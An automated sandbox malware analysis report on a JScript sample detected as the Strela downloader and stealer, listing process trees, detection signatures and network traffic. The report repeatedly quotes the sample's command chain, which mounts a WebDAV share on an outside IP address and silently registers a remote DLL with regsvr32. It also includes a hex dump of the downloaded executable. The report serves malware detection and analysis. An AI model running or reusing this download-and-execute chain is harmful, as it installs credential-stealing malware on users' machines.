Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
126484723232027823.js

Overview

General Information

Sample name:126484723232027823.js
Analysis ID:1576785
MD5:09024cb4c452f96fe5b6045e198092ba
SHA1:53f924039e79576a5b2e9b90e3c11c1116e933eb
SHA256:0ff304716b215d4fadbf9fee1be5d717c454a09f6bdbe6e42e29995d969964e8
Tags:jsStrelaStealeruser-lowmal3
Infos:

Detection

Strela Downloader, Strela Stealer
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Yara detected Strela Stealer
Gathers information about network shares
Opens network shares
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3144 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 3876 cmdline: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1088 cmdline: cmd /c net use \\193.143.1.231@8888\davwwwroot\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • net.exe (PID: 4832 cmdline: net use \\193.143.1.231@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • cmd.exe (PID: 6768 cmdline: cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • regsvr32.exe (PID: 3144 cmdline: regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2271164628.00007FF8B7E10000.00000004.00000001.01000000.00000007.sdmpJoeSecurity_StrelaStealerYara detected Strela StealerJoe Security
    0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StrelaStealerYara detected Strela StealerJoe Security
      Process Memory Space: wscript.exe PID: 3144JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security
        Process Memory Space: regsvr32.exe PID: 3144JoeSecurity_StrelaStealerYara detected Strela StealerJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          11.2.regsvr32.exe.7ff8b7e00000.0.unpackJoeSecurity_StrelaStealerYara detected Strela StealerJoe Security

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_3144.amsi.csvJoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
              Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\regsvr32.exe, SourceProcessId: 3144, StartAddress: 24BBDB0, TargetImage: C:\Windows\System32\wscript.exe, TargetProcessId: 3144
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", ProcessId: 3144, ProcessName: wscript.exe
              Sigma detected: Communication To Uncommon Destination Ports
              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 193.143.1.231, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 4832, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
              Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): Data: Command: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3144, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, ProcessId: 3876, ProcessName: cmd.exe
              Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, CommandLine: regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6768, ParentProcessName: cmd.exe, ProcessCommandLine: regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, ProcessId: 3144, ProcessName: regsvr32.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", ProcessId: 3144, ProcessName: wscript.exe
              Sigma detected: System Network Connections Discovery Via Net.EXE
              Source: Process startedAuthor: frack113: Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1088, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 4832, ProcessName: net.exe
              Sigma detected: Windows Share Mount Via Net.EXE
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1088, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 4832, ProcessName: net.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              Networking

              barindex
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 8888
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 8888
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 8888
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49709
              Source: global trafficTCP traffic: 192.168.2.5:49704 -> 193.143.1.231:8888
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Tue, 17 Dec 2024 14:11:14 GMTContent-Type: application/octet-streamContent-Length: 418816Connection: keep-aliveAccept-Ranges: bytesEtag: "1811fc31dcbf3e9066400"Last-Modified: Tue, 17 Dec 2024 14:10:22 GMTData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 04 00 19 51 61 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 00 00 d2 00 00 00 8e 05 00 00 00 00 00 f0 12 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 06 00 00 04 00 00 00 00 00 00 02 00 60 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 f0 00 00 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 06 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 11 d1 00 00 00 10 00 00 00 d2 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 00 00 00 00 f0 00 00 00 02 00 00 00 d6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 84 88 05 00 00 00 01 00 00 8a 05 00 00 d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 18 00 00 00 00 90 06 00 00 02 00 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: Joe Sandbox ViewASN Name: BITWEB-ASRU BITWEB-ASRU
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: global trafficHTTP traffic detected: GET /140341625623863.dll HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: 193.143.1.231:8888
              Source: net.exe, 00000005.00000002.2185942636.0000013018382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231/
              Source: net.exe, 00000005.00000002.2185942636.0000013018382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231/0I
              Source: net.exe, 00000005.00000002.2185942636.00000130183A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231/bcf3ed6d7050e4
              Source: net.exe, 00000005.00000002.2185942636.0000013018382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231/dI
              Source: net.exe, 00000005.00000002.2185942636.0000013018368000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2185942636.0000013018382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Yara detected Strela Downloader
              Source: Yara matchFile source: amsi64_3144.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 3144, type: MEMORYSTR

              System Summary

              barindex
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_024B9A3011_2_024B9A30
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_024BBDB011_2_024BBDB0
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_024EDA0011_2_024EDA00
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_024F2B2811_2_024F2B28
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_024E6F3011_2_024E6F30
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_024EA39111_2_024EA391
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_024F98E811_2_024F98E8
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_024F29A411_2_024F29A4
              Source: 126484723232027823.jsInitial sample: Strings found which are bigger than 50
              Source: classification engineClassification label: mal88.rans.troj.spyw.evad.winJS@12/0@0/1
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5688:120:WilError_03
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\wscript.exeAutomated click: OK
              Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
              Source: Window RecorderWindow detected: More than 3 window changes detected

              Data Obfuscation

              barindex
              JScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Run("cmd /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s", "0", "false")
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_024FEEFE push ecx; retf 003Fh11_2_024FEF5E
